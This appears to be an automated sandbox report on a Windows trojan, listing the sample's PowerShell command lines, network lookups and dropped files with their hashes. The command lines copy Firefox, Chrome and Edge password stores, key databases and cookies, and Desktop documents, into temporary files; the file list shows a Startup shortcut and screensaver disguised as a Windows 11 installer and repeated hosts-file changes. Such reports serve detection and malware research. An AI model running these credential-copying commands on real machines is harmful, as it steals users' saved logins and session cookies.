"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\5oy242k24e240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\l2a139w1240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\jom9k7j13240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\2opxstaet240696171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\yf6pw5mchnd240696171.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\rgf72ajgb240705546.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\a388vq9la0kvz71240705546.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\4vt3u3tjt240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\tbzqz5bgb6240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\8cbcluskncja3240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\uetb77q1gtv240714531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\arxozshvs240714531.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ibgqcei52nq6amwa240720984.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\natpu47qqegcjqaw240720984.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\lz1l7ec52tnr78240727468.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\zslvhu8uvd240727468.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\vjohb7g5en8240727562.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\m7irgx4mlmnf1240727562.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\vhzjq0p3twn240741062.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\l6mrxkjyktx240741062.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\4kqxrdxny0240741156.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\0dsbrq84ff6u240741156.tmp\" -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\Desktop\BlockHide.M2TS\" \"C:\Users\Admin\AppData\Local\Temp\w6cae20njgw94pi5uw3kr8hk34.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\BlockPop.jpg\" \"C:\Users\Admin\AppData\Local\Temp\jjtzxmz59zyyz2nrn8h0v.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\BlockRedo.crw\" \"C:\Users\Admin\AppData\Local\Temp\f7jnqgmt7wcgwj6dq0o9.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressSave.DVR\" \"C:\Users\Admin\AppData\Local\Temp\d0yas27fwgf324tiv8yu9gjq2cda2.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressStop.gif\" \"C:\Users\Admin\AppData\Local\Temp\u60eqlkv72kuzf2o0z9te0d.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DisconnectExpand.jpg\" \"C:\Users\Admin\AppData\Local\Temp\5xsnbobwf8hhgj9fyun0f6tzd05.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ExportUnprotect.pps\" \"C:\Users\Admin\AppData\Local\Temp\kakl6szvzqmrwl1zxl9azojz4.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\NewBackup.ram\" \"C:\Users\Admin\AppData\Local\Temp\9wuohmvd26ur9fiar3u605.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\OptimizeConvert.au\" \"C:\Users\Admin\AppData\Local\Temp\l08pizqa7zhc9gnefvbec3tkq1.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\PopAssert.clr\" \"C:\Users\Admin\AppData\Local\Temp\154zpnv0d74nnk9ehz5lk5x.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\RegisterResize.docx\" \"C:\Users\Admin\AppData\Local\Temp\chisdkm4kxsbov24b02f.tmp\" -Force"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipINFO.io | udp |
| US | 34.117.59.81:80 | ipINFO.io | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:50279 | tcp | |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/2212-0-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/2212-2-0x0000000000401000-0x00000000004B7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp
| MD5 | 40627c5fe58bb5a60606e5be621af052 |
| SHA1 | c21ec14767478d0e4bd1184ad6c2c280e2d1342f |
| SHA256 | bd4cbba2f23b512fad5b0c84d2e9502e4bfea75cac78482d22036968e8224b42 |
| SHA512 | e418ed7c9768a4237622be7a53b761a45ca4d4cf37643fcfdf9cb2f200a95fc904b213fb1a37befb86e6ff93ae3c5ff0f39243305789236d4031e017ec99085d |
memory/4892-6-0x0000000000400000-0x000000000071D000-memory.dmp
memory/1396-9-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/1396-11-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/4892-13-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2212-15-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/804-20-0x0000000000400000-0x000000000071D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\pik.exe
| MD5 | 78c269b72f5b1d9bd4654cef3fb4a986 |
| SHA1 | c44db702175e2d474e3221a0de14f01c1f35129b |
| SHA256 | ace03b12b8763bd8567425f288ded8f8f0d9acd62f81de17414bd300d21820ab |
| SHA512 | bc9abf69debc967df59e16491ec533ab59b997d8ea89d7ebc1ba0a04b319d5f3746cd9e22b8b2c10b4ce655fb5a813be08214e142e97107cb07222f7dc19bee5 |
memory/4760-186-0x0000000000D30000-0x0000000000D56000-memory.dmp
C:\tmp\.vbs
| MD5 | 2e2fa9827b9d476133f122be9012408c |
| SHA1 | 3a3d0d1135f95227693a46a110312a3c1a177c51 |
| SHA256 | 184fb09c2a02a1e5d23c9abe64affd866a919b7b287622069371716223f3b1b6 |
| SHA512 | 2e4a431fca5dada81cb22af865b122635b9b93e89b3948e86a2d6dd0c4b8eadbcf594ea1fb817818738468a831ecac75d7247d226d4ce901a9aaec66bc2c0e89 |
C:\tmp\.cmd
| MD5 | dee7acbdbf3f448057dae93e28514690 |
| SHA1 | ae56d802230bc13e7663be388781d7d1aa1ef3d0 |
| SHA256 | 5ec9a6efe3c3451a967335bf7d7bcb2f916fc8ba81c0b1118018d079fbffb5ec |
| SHA512 | 77cdd3ab66e49267907e3711ab7878469976ba677a683bead7d5e63353b03164345aef0ca0dd5d124488eca7cfef1f64ebde363d76596ef882cb2c56e1f41504 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk
| MD5 | 5628f01be53f303a39bc7e2a979c722a |
| SHA1 | 066d8d3c25154eabc2b3962344f90bf6d9ef12f6 |
| SHA256 | d1398a349bc31b1b32efb3f76d4248eb1a44dde6ad8b38b150468083a4aadd42 |
| SHA512 | 1ecf2f0ac77acae00cd5c0e0b611abd368b6906565f8871de79506ed74bb5ce40033191fc7f370c4d26a21d1e0e3a10f70ebe322b8401f2b87571792293069e3 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 3d19ae65bc53c6aa833b82ca7fa61cd4 |
| SHA1 | a3b94891864abdc9a8fec3022b3df060923ead46 |
| SHA256 | fcdc3e57b51ed726d90fca4aa19ba09e2bdb7a04fd573bf854465883aa326e14 |
| SHA512 | 8e4e3b8efa9d05497a27e79b82238bd9864ce3e1226ade8358491697173e19f6a12f2f181c64b481cd211ec5231804e9c683d72e5d0cf74208b7adb7a80f6e9c |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 1da12c8dc6dee2cf35786d7214c7c5cd |
| SHA1 | fe81b4162636a4f8ccc16d7ad8dd3e5c8165bc63 |
| SHA256 | 18396e55e85d07cc36c223bf7f30e3e2e2cb171e89313b622a6df041f1095333 |
| SHA512 | b465e1c2b1bd4ceb0a2f195c0666c6d4c3ec4b55131be652bfbdee8dff8c9b4f6f52b95ab7562b5ff669dd43e03996453563fc8a3a04ad9f33d141c1bf19f180 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | dae09e71a424a796e57972976432802e |
| SHA1 | 3190c52ba6422c5421f53b12d016cbaeaeafc14e |
| SHA256 | f89d667e7c4a1a85bba63ac8fb4eb4d55d442a323011f222d39b92308b4ecb62 |
| SHA512 | e96a6d8645ec1ea926d154c6ccb1ef6bf172e74a2301624d9de84200bb4c0d7fbe0404b7a0d362c9e1151889d18576bf1c17007b4260cf4b60d018b5506e0f7c |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 6193636e0937f9aa8d1a51760700fe36 |
| SHA1 | 0f31660fd9f0181c977d392c1af12d9ff4295f3b |
| SHA256 | a073d240b848ae572360eeb4a59493078121dd38e827152bb60b44b9b88d4000 |
| SHA512 | 899572343acb5a95fcca3325e6b0db1eaa759c8bfe05556cb1d6b3da7498c6e46e91d5a31dae067aaafeb37f776f601efe69481c1125cf1db57cd80d6034d544 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 9845dd85124401f5a66f558a8aca99b0 |
| SHA1 | bd1e578ff26e1f8ceac98a8e334cab116358ff1b |
| SHA256 | bd67f1c4cbd53fab37860e3039eb9f0d36f8d3d699c012ed73e0103300073eef |
| SHA512 | f6141adc9e43ea3fb70e63c38be2c5f49c7d68dd2121a5ff866665429cc78fbc11e6df9c9766901d3f6bdf7fa2dde43af6e46bf364fd9740d80268fdf59df33f |
C:\Windows\system32\drivers\etc\hosts
| MD5 | a61ea7aef83b5cf13a79f3261b754299 |
| SHA1 | 1b145d66880360213d9ebf1593aeb9146711500b |
| SHA256 | fc9d51689428140dd4cee3c9d5e7a85dbe2d38f8cbb182a453258de4866b533b |
| SHA512 | 3c73458b4532ccabf3996923d3d825626b5505b8f180e727d86fd7667b844e4022eced25c20507262182113d550f21a2b0f6d5acf2896a37e9ee894495ed33a4 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 65b958df30a0d5264a6960b43d1ba803 |
| SHA1 | c5486386da0209c11d769be8db9a250cf91761a9 |
| SHA256 | f1d5f0d18e1caea663ebd7a953904bf783ae1eaafa25f7a0fbec1a36d47eb55a |
| SHA512 | 7845885e7c2d57f44f61daaec63b33fec69c6e712b79286fd33a295a2408813c48d68d7bc70ed144f87e30644b3e214eaaaa1ebb9e70a0af2c509c5d6cfe269d |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 93c55af47cde7b357a50adeafa4b7e0b |
| SHA1 | afff2bdbe8b05cd4aa3a93062673d8798e474d7b |
| SHA256 | f21a0e37e0d2ba27fdf62153e591f51cb40aa78007c4f86b38ed116bd4cb70a2 |
| SHA512 | f407b6d54fbe6afc119d0fcecf1201ad785ee05f3c791150343f0cefbffec8b92b34f371ebb6b5d8d0e47b0ff3a6ad51dcf150d6ce6bb77eaef9c481a5fb1226 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 30153c993d05eba1f074f5426d06d6b6 |
| SHA1 | 6111f38cff97f5f315c84929030e16d5e8895c4c |
| SHA256 | 0da79bd7b13e8ede21f933b07dc131f5c6660c6dea05abd213c5210639b53527 |
| SHA512 | 23a262bf715090bf0011cc4a3eb859ed21ab1fd792b6d39ae0c29892afce3acacfae2be9aa3e1df0006def44d6b3fd2bd5755807e58efc819f29ef2cfdf8ab42 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 37266ef3483bf46b93fe8bd1b5ef0be0 |
| SHA1 | 5523aeeaef268f04d5e28ba2333395835078b9e2 |
| SHA256 | a7958ee25a7cb12da3b75b0f1108d3d8063d373846d5ec4a1d793b696a568ddb |
| SHA512 | ee3c1971740413c0a123c437b6ffaaa45c2bc487064f3f79a3a74f0e9118e66ed7d8b5e93dcf6a0656c3721dec217b7122f71d0c7663a1ee28943b3f2fe11675 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | a57c2edf507991d9b7841950d5ba13ae |
| SHA1 | 73d3e83fb0416098737586205071e449e170bfa9 |
| SHA256 | 536825f9edd7ab2a8bac641368ce3f6e7e69d5f10c606a5ec83db824b72e51b3 |
| SHA512 | 224081bf959a0f3182782581e4872000512d06633ad9026f69c88183d426055e62ac28ca97513ee00e4144144f1f7bfd3f4add8fe720031b2f7ecb68a5ee8d77 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | ceffd1a4bd82dfd9ffcab66c348da323 |
| SHA1 | bfabe81531cadb591370eb6eaa5ade0ec8974e0c |
| SHA256 | 16108ca4ccf2d9b1f45e7eac33aa422200997465c8dac3ec8f8347aec5c51dde |
| SHA512 | e0fdfcdc72bb0b4194d4e994e04b528e67ab5b95a9d346da74a0f0e1d0aefa79d2a547892eacd29d5c9fbc4c8ffced4bd9dccdee8bee02c9d8e5ad5c6710e7a8 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 60c4a7e2cf4efaaa5dd1faf837dcbe8d |
| SHA1 | 1c21c8a9f1834affe9017e1843fa4bf8f8011624 |
| SHA256 | 1152acdf6b94a5d48d56b5cb78199be434106a5d223bbdce65c6a3d681296ff1 |
| SHA512 | 30043e461f3e1f9a19d24dc582d171a7b50cb9c60fbe03ece12eedbed3d41b745714327706c3e93265aab98f206fc144a7e03904465fcb19d9a681b8639a1e09 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | bb20ef9c5e8647b19e7af26229108c99 |
| SHA1 | ff642a69365bdf05364872d951ff5bf9c403a804 |
| SHA256 | ef63978031b34cdc4613db378395ce28f3cc7d35f318ac62f730f90edf181f44 |
| SHA512 | 914ace2948982c607c61293d79bef662446b5227eac258abfdf601ef8eb968680ba5ceca1319d0c32064c21ded5812c0b3319642749083d52ea8905da82bc22f |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 24ec3a554f64015482f0960b410d8bd0 |
| SHA1 | 475ff8b22800c59a3f7446e693eac5292532f39e |
| SHA256 | 1692df1cc5b0f58b7df9ab78821a06196b0466683983c8949cf6b01ef12b0df2 |
| SHA512 | 977a9a1984c06800487eef736a1a9061acb6f62c6aa66dba919339007aa973bbf9a10e51482bdb59e14ff646b2c85c6198e59211d116b148fb7ca1d53415f3e4 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 710e85ee4c7bf73f9c8e8b0e0224af55 |
| SHA1 | 61f0aae0865344c6f799cf489c02ec64cc50bdd3 |
| SHA256 | e5c6683bb998f821dc813fe05eed0e90a73dcc64589238370871ec2cf1e12246 |
| SHA512 | 5221fd39ceae5a40393884d03122e3023e8b8b46808ce47ced7e6bc416838e539109bed81c3f3bf1cbe9034a86cef08c3f3f791a04b5dc7762af0e5a9726fc27 |
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\.cmd
| MD5 | 22a845995279c76177c613100a58d134 |
| SHA1 | 5cc94610bcdba7b0d514b711852a6cdb56db3ae1 |
| SHA256 | ca30adad79ccd83b3dc79f26a58c1552559176f8a271237c6d4d7ccf307920c0 |
| SHA512 | 0a4a3eb765847ab66e847bb83202ee8ad5d8591659a8be9e3ed4b6863f3aac28f9d4f6e2d4ca5c5efe800cfe30d471122b2f96807c2735dde5c6ade16c064cad |
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
| MD5 | 408dd6ade80f2ebbc2e5470a1fb506f1 |
| SHA1 | e00293ce0eb534874efd615ae590cf6aa3858ba4 |
| SHA256 | 4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71 |
| SHA512 | 4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0 |
C:\Users\Admin\AppData\Local\Temp\3k1f5r2b.tmp
| MD5 | 31c5a8d7f0d900bfff09d437a7457478 |
| SHA1 | c32f7abbc47949c340a2136bb8cc4787f05b1eff |
| SHA256 | 89da44ebaa36a31740f9dbc585cefc3f55cf725f7d8d745b44ba259f0a1d8455 |
| SHA512 | 0089a7e5e0c3d7b8a226775f30983e901b323846d5263366672390ebbbd9212bd72bdb87c7baeeb09c6438317a66f5ccfc20cd898579190e6bb7579dd1cd158a |
C:\Users\Admin\AppData\Local\Temp\autA077.tmp
| MD5 | bdb4dcbcec51d9ee1afee83221921fee |
| SHA1 | 21d56a9334238297d1a09aba46043cc36c9e2d3c |
| SHA256 | 9e5d8505b986e40cce00707180334fead34c0c3b590c458305de89e4bbc85f75 |
| SHA512 | cad20e6355cfe1e42a4ee7f5350a033ec79b8ed2689d8c6fa11bb1c3ae2a99425f03d95312ed9daf5c2543fc7ce38239fca41700cbecbc02a007a669ffd81fa5 |
C:\Users\Admin\AppData\Local\Temp\autA076.tmp
| MD5 | c87a407a6decc862e3132efc8ab504c9 |
| SHA1 | 20cd713fa491119aabfd25a7cce7a8209098f903 |
| SHA256 | 439de9f662754bbcfc211658ce3f1c1730e85df199ed1e067940e28831d2c758 |
| SHA512 | 8bed0ca582ca5b46f0c6922995343388df0d84d063512308d3f58c31da1811cb2c47b87be0ce5de4a1fb8ce14f89f8f3197f31bb0ca989fa159514f6751e1832 |
C:\Users\Admin\AppData\Local\Temp\autA078.tmp
| MD5 | 3886aae8ae30f288363ce4d2ac4f81c2 |
| SHA1 | 19441c886b57ed9f4650f614f0d93501d0a33e40 |
| SHA256 | 37f10f3d46a2886cac6169a398e91dd8cd0cfd06a7b6812e1afb68c4c031b9fd |
| SHA512 | b37aa26a5324723d9b8a7b919c3727565a1e1974ba1316093b59dbe4a75f5e0773288894d7abb403d65688e0e3f29ef4b48af7a8048e64fe36199bf8d371fb31 |
C:\Windows\Temp\4o8h4w8u.tmp
| MD5 | 1c9fed3d9916075d80c21e1fddc30412 |
| SHA1 | 5bc7f275a846ae135e655549c27ebd02210fdb3b |
| SHA256 | c51bdd9882e9e515838b663120d9303d30a01fe0b3bec498c1311072ccda61d9 |
| SHA512 | 72e512bf1ed285126fe58084949d9f4be2a98fc8e196743fcd6bd5340bff36c294c18c7581562dda88435b24b4a5234ac189818e0d0e017bb4cfcbe0b11deec4 |
memory/1396-486-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/804-489-0x0000000000400000-0x000000000071D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
| MD5 | e9f5799bcca4695afee82c0781242577 |
| SHA1 | 240bf1ae93f432aef2a05daeed3299d12bd7e6f8 |
| SHA256 | dc24023611f63b84f4fddc095a1417518ae1972743dbbff014d31218770e48d6 |
| SHA512 | b1551197efd2209b633ed0ca581332a1871416a541a64ef99dffd75c7a082b65c4fa3abdc15b84ff92cdac224c6616a40c17b33c268df3f6244f0b2c920b143c |
memory/1276-494-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/1276-495-0x0000000000400000-0x00000000006A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\.cmd
| MD5 | 6f0d036f6681bac6fd742591ddc62808 |
| SHA1 | 2e518c19ec29b7a3a69cd9d4c120d3b88d71102b |
| SHA256 | ce8f0822d428e39157fc6ed433b8da7fa7ce62ece2c73bed9930d50f7cb41f24 |
| SHA512 | 8aeb47d8a15ab62a1a6e23f93a916f361703d2ac64a302d2364d40de016dc2167d653ca905197d81e4c578fdbb81eb88a22c7cd81abe08756ec86dda6a44aaf6 |
memory/804-502-0x0000000000400000-0x000000000071D000-memory.dmp
memory/1396-505-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/1276-506-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/1652-507-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-509-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-511-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-510-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-512-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1276-514-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/1652-513-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-517-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-518-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-516-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-515-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\write.zip
| MD5 | ef88549f7a8414ce0aebdaf4de835300 |
| SHA1 | dcf60b5bd5cd05b343c216d550151a0059989282 |
| SHA256 | 23f9e3eec05e8450b8c3eaaf20e06095966ec564397b1d46dfb18581ef370dbd |
| SHA512 | a7d1cecf26fb07566d9366ab4fe879932a2e1409d046db57f8f2fce70da8fbefbc7a580943b0307743d857a7fa86464dbda86d3e6e05bd67327fb5dcf42325f9 |
memory/1652-547-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-549-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-548-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-551-0x0000000011000000-0x0000000011158000-memory.dmp
memory/1652-552-0x0000000003200000-0x00000000032A7000-memory.dmp
memory/1652-554-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/3852-557-0x00000229D5FF0000-0x00000229D6012000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4nuqozks.0hv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | f7a4c9fc26f21062c8d6ac0f41c8ca06 |
| SHA1 | feb175b66b87f65f38653f233c088792a5e7cc63 |
| SHA256 | dfba78b537bc068ece3b601104487d663a501d5dc3a55eff4644291e53776161 |
| SHA512 | 5416d472717cb2b4ae7df44e96a1cc5ed86759b1b90c310241b2cedb43dc052f8e84b8448cc232e62a3a21f7b346238f99b962a0e9a62cbb9abc43a6e1252cc7 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 1356394363c62d7fddab203c0930fd87 |
| SHA1 | 0456be6423fa8e68054c415ff02bc580799055a6 |
| SHA256 | 973c9aef26d3bd2b622212d550d34016587c08f3654e2afaf0e2c49b87d62436 |
| SHA512 | 20567c6fc54db3915422913eac6359a2f11ee034466e65b58d09f5fe0d929ac1f5168b626c5c3b1e41985252007cedefe846099991daee9d4150acb1d72a3ff8 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 713ad359b75fe6d947468ec1825202b9 |
| SHA1 | 19dcd19f18a2ad6deb581451aad724bd44a592a4 |
| SHA256 | 56572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4 |
| SHA512 | 4df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8e1fdd1b66d2fee9f6a052524d4ddca5 |
| SHA1 | 0a9d0994559d1be2eecd8b0d6960540ca627bdb6 |
| SHA256 | 4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13 |
| SHA512 | 5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3 |
memory/1652-586-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/2444-588-0x00000201ED0A0000-0x00000201ED2BD000-memory.dmp
memory/1652-589-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1652-590-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6a2e28f9d4498e47ee93eafdca078276 |
| SHA1 | b86ca19ef481d729b30734bac9c92d97d6e757e1 |
| SHA256 | 48008a0874fa69ca2d128bcb46c00b54106581f8e366c563ec1fa675f1ba07e2 |
| SHA512 | e0050f7d7bfd4747129cc45d101490475022b6d6664129510608aa196326faa2f3fd4f61f390fb35c9e2ab448fcd103bd5d461ddbbedd6858ddc1ae86e745218 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ae009279adf7e456d14ca8fe219f939b |
| SHA1 | 6718948629feb45cf924c9533bbe532987563b09 |
| SHA256 | 4bf7e7715a2bc9070a04dab852d53ab0adde2f46df3520ba31cab3b18e565ef0 |
| SHA512 | 2388e90e0f9e592b9ae3d400cce073225e6d5316d12df53d9ca9d32b45ae396937874672aff61f3d13c04cbecf7314eab256e1fad6e7b8cd5c29704c475a302e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | c8f946f99ec6b52be3aca0dfd0c41f1c |
| SHA1 | 8b345b5f75c05668726d9142d4ca808f75051301 |
| SHA256 | 23efda72d4effc89b6877489065e5af998823f1a332f0e95113468cd053ecdef |
| SHA512 | 34790b1e1d7c3e63760cf0a8a621dd261492e59f54f52d77103f6dad68f7da859302ff4424d86598e5560158afa6bac9be84579994ea18884aefc1caf9def529 |
